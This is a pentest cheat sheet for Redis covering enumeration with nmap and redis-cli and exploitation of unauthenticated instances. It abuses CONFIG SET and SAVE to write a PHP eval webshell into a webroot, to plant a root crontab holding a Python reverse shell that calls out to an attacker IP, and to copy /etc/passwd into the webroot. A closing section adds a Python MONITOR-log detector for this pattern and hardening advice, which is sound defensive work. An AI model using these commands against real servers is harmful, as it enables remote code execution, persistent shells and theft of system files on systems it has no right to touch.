Redis is an in-memory data structure store used as a database, cache and message broker. It normally speaks a plain-text protocol (port 6379 by default) but can also be configured to use SSL/TLS.
Hydra supports Redis.
Nmap scripts
List the Redis NSE scripts shipped with Nmap, then run redis-info against the target:
ls -la /usr/share/nmap/scripts/redis*
IP=x.x.x.x
nmap --script redis-info -sV -p 6379 $IP
On the server
Instance version
redis-server --version
Redis Client
redis-cli
redis-cli -h <hostname>
If the server answers with the following error, it requires authentication (AUTH with a valid password) before it will accept commands:
-NOAUTH Authentication required.
Commands within the Redis client
Look under the “Keyspace” section to find available databases.
info
client list
config get *
Assuming the database ID is 1 (see the Keyspace section of the “info” output):
SELECT 1
(select database 1)
KEYS *
(list all keys)
GET <KEY>
(read the value of one key)
Webshell
You need the webroot path. Common locations:
- /usr/share/nginx/html
- /var/www/html
redis-cli -h $IP
config set dir /var/www/html
config set dbfilename redis.php
set test "<?php phpinfo(); ?>"
save
redis-cli -h $IP
config set dir /var/www/html
config set dbfilename sh.php
set payload '<?php eval($_GET[0]);?>'
bgsave
Reverse shell crontab
Not working for now
For Ubuntu and CentOS, the cron spool path is /var/spool/cron/
echo -e "\n\n*/1 * * * * /usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.85.0.53\",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'\n\n"|redis-cli -h 10.85.0.52 -x set 1
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dir /var/spool/cron/crontabs/
OK
root@Urahara:~# redis-cli -h 10.85.0.52 config set dbfilename root
OK
root@Urahara:~# redis-cli -h 10.85.0.52 save
OK
KALI=x.x.x.x
IP=y.y.y.y
echo -e "\n\n* * * * * cp /etc/passwd /var/www/html/passwd\n\n"|redis-cli -h $IP -x set 1
OK
redis-cli -h $IP config set dir /var/spool/cron/crontabs/
OK
redis-cli -h $IP config set dbfilename root
OK
redis-cli -h $IP save
OK
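As an added defender-side example (not part of this cheat sheet), the following Python parses Redis MONITOR output and flags the sequence used in both the webshell and the crontab sections above: a client issues CONFIG SET dir pointing into a webroot or cron spool, CONFIG SET dbfilename, and then SAVE or BGSAVE. The watched-directory list and the sample MONITOR lines are constructed for the example.

```python
import re
import shlex

# Directories from this page where a dumped RDB file is interpreted as PHP
# (webroot) or as a crontab (cron spool); an assumed list, extend as needed.
WATCHED_DIRS = ("/var/www/html", "/usr/share/nginx/html", "/var/spool/cron")

# One MONITOR line looks like:  <unix ts> [<db> <ip:port>] "cmd" "arg" ...
MONITOR_RE = re.compile(r"^(\d+\.\d+) \[(\d+) (\S+)\] (.+)$")


def parse_monitor_line(line):
    """Return (client, argv) for one MONITOR line, or None if it does not parse."""
    m = MONITOR_RE.match(line.strip())
    if not m:
        return None
    try:  # MONITOR double-quotes each argument and backslash-escapes quotes
        return m.group(3), shlex.split(m.group(4))
    except ValueError:  # truncated line with an unbalanced quote
        return None


def detect_rdb_write_abuse(lines):
    """Flag clients that point the RDB dump at a watched directory and then save."""
    state, alerts = {}, []  # state: client -> {"dir": ..., "dbfilename": ...}
    for line in lines:
        parsed = parse_monitor_line(line)
        if parsed is None:
            continue
        client, argv = parsed
        cmd = [a.lower() for a in argv[:2]]
        if cmd == ["config", "set"] and len(argv) >= 4:
            state.setdefault(client, {})[argv[2].lower()] = argv[3]
        elif cmd[:1] in (["save"], ["bgsave"]):
            cfg = state.get(client, {})
            target = cfg.get("dir", "")
            if target.startswith(WATCHED_DIRS):
                alerts.append({"client": client, "dir": target,
                               "dbfilename": cfg.get("dbfilename", "dump.rdb")})
    return alerts


# Constructed MONITOR output: a PHP drop, a crontab drop, and a normal app save.
SAMPLE_MONITOR = """\
1700000000.100000 [0 10.0.0.5:41234] "config" "set" "dir" "/var/www/html"
1700000000.200000 [0 10.0.0.5:41234] "config" "set" "dbfilename" "sh.php"
1700000000.300000 [0 10.0.0.5:41234] "set" "payload" "<?php eval($_GET[0]);?>"
1700000000.400000 [0 10.0.0.5:41234] "bgsave"
1700000000.500000 [0 10.0.0.7:50112] "config" "set" "dir" "/var/spool/cron/crontabs/"
1700000000.600000 [0 10.0.0.7:50112] "config" "set" "dbfilename" "root"
1700000000.700000 [0 10.0.0.7:50112] "save"
1700000000.900000 [0 10.0.0.9:50000] "save"
"""
```

MONITOR streams every command and has a measurable performance cost, so it suits an investigation rather than permanent logging; the durable fix is to require a password and disable or rename CONFIG (rename-command in redis.conf) so the dump target cannot be changed over the wire at all.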